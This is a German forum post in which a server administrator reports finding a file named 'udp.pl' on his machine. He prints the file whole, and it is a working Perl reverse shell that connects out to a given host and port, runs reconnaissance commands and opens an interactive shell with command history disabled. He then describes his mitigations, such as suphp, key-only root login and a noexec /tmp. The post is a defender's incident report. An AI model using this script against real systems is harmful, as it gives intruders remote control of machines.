Beim Täglichen durchstöbern meines Systems entdeckte ich folgende Datei die sich "udp.pl" nennt...
Hier der Inhalt:
Code: Select all
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");
Das Perlscript wurde aber mit meinen userrechten angelegt und nicht als Root.
Code: Select all
-rw-r--r-- 1 web users 346 2006-06-14 17:24 udp.pl
Daher ich php als CGI laufen lasse und suphp überall einsetze, wird derjenige nicht weit gekommen sein, aber dennoch macht man sich Gedanken.
Direkter Rootlogin ist auch Gepserrt und es ist nur ein Login mittels Key möglich.
Ich Stöber mal bei meinen anderen Logs ein wenig rum, ob nicht noch irgendwo was auffälliges vorhanden ist. Mein OS halte ich eigentlich immer Up to Date, sprich Security Fixes und setze auch auf einen Kernel mit GRSEC.
Naja mal sehn was sich noch so finden lässt.
Werde das /tmp Verzeichnis wohl noexec mounten... ist zwar kein 100% schutz, aber eine kleine Barriere für den Angreifer.